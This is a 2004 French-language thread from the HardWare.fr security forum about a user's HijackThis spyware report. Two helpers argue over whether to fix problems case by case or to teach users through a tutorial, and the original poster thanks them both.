HijackThis est une question à laquelle je me suis intéressé il y a maintenant un bon moment. Et à force, on arrive à cerner les pb, à savoir exactement ce que l'on doit y chercher et y trouver et surtout à dégager des procédures pour résoudre les pb.

A+! :hello:

acrobaze

sanpellegrino a écrit :

Je ne comprends pas bien le sens de tes interventions.

Tu pensais que Pasan aurait une illumination lui révélant l'utilisation simultanée de CoolWebSchredder et Ad-Aware le tout en mode sans échec? Et ce, grâce aux liens de ta signature?

sanpellegrino

Acrobaze a écrit :

Salut!
Je crois d'abord que la base indispensable, c'est l'expérience.

Mais comment veux-tu en acquérir si on est face à des types comme toi qui n'expliquent jamais rien !

Acrobaze a écrit :

HijackThis est une question à laquelle je me suis intéressé il y a maintenant un bon moment. Et à force, on arrive à cerner les pb, à savoir exactement ce que l'on doit y chercher et y trouver et surtout à dégager des procédures pour résoudre les pb.

:fou: et tu as tout appris par toi-même, grand manitou ? On te demande tes sources !

Pourquoi tu ne fais partager ton expérience que par des petites résolutions comme celle-ci ? Tu as peur que quelqu'un s'y connaisse aussi ? Quel insupportable égoïsme !

C'est exactement ce que je me tue à te dire: c'est pour des types comme Pasan que j'ai écrit ce tutoriel ! Tandis que toi tu ne veux rien expliquer, tu fais juste le bot qui répond !

Et le pire c'est que tu as l'air de t'en foutre [:wam] .

Et une fois de plus à court d'arguments tu choisiras le silence ? Ca ne m'étonnerait pas...

Message édité par sanpellegrino le 09-10-2004 à 13:00:09

---------------
Got spyware ? | HFR HijackThis Tutorial

acrobaze

Ca devient très très ennuyeux, ce genre d'intervention.

Si aider quelqu'un d'une façon responsable, c'est dire:
-Va copier/coller ton scan dans l'analyseur automatique
-Recherche sur Google les fichiers signalés.
Ben non, c'est certain que nous ne sommes pas d'accord.

Quant à mes sources, désolé. Je n'ai pas compilé les centaines de rapports analysés.

Maintenant, je te demanderais d'arrêter tes interventions hargneuses.

Pasan

Sanpellegrino, excuse moi, mais je ne comprend vraiment pas ton intervention????
Elle me ferait presque passer pour un.... Abr..., Non, non calmons nous.
J'ai sincérement l'impression que l'on a en la personne de Acrobaze quelqu'un de sympa, compétent, efficace....
Pourquoi tant de haine?

Pasan

.....Toutefois, pour rester honnête, Bravo a toi aussi Sanpellegrino pour la qualité de ton tutoriel sur Hijack This.

La tolerance, la tolérance!!!

sanpellegrino

Pasan, bien sûr que non je ne te prends pas pour un abruti . Plutôt comme un témoin dans ce cas précis, je m'explique:

Que préfères-tu ? Que quelqu'un te fasse la hotline à chaque fois que tu as un problème ? Ou bien qu'on t'explique et t'apprenne comment résoudre seul, éviter et prévenir ton problème ?

Acrobaze choisit le 1, moi le 2. Je ne comprends vraiment pas qu'on puisse répondre au cas par cas systématiquement. Tout ça sans justification aucune, aucune coopération ou collaboration, en un mot sans aucun partage. Mais je m'arrête, je parle à un mur, qui de toute façon n'est pas prêt à se remettre en question une seconde.

Content que mon tuto t'ait servi (vu le nombre de vues tu n'es pas le premier, c'est tout bon), n'hésite pas à revenir poser des question quand tu veux :hello:

---------------
Got spyware ? | HFR HijackThis Tutorial

Pasan

Pour conclure ce débat....

Merci à tous les deux qui m'avez dépanné, je dirais de façons complémentaires..... ;-)

Publicité

FORUM HardWare.fr

Windows & Software

Sécurité

Rapport Hitjack

Sujets relatifs
rapport hijackthis	rapport Hijackthis vos avis svp
probleme de spyware/ rapport hijackthis	petit rapport HijackThis a verifier
Outlook Express et son f*ckin' rapport d'erreure	probleme avec explorer.exe trop gourmand (100% de uc) rapport HijackTh
rapport d'erreur lorsque je clique droit sur fichier vidéo	Utilité d'un modem routeur par rapport a un point d'acces?
rapport d'erreur étrange	cable RJ45 : rapport longueur / Performance
Plus de sujets relatifs à : Rapport Hitjack

Page générée en 0.098 secondes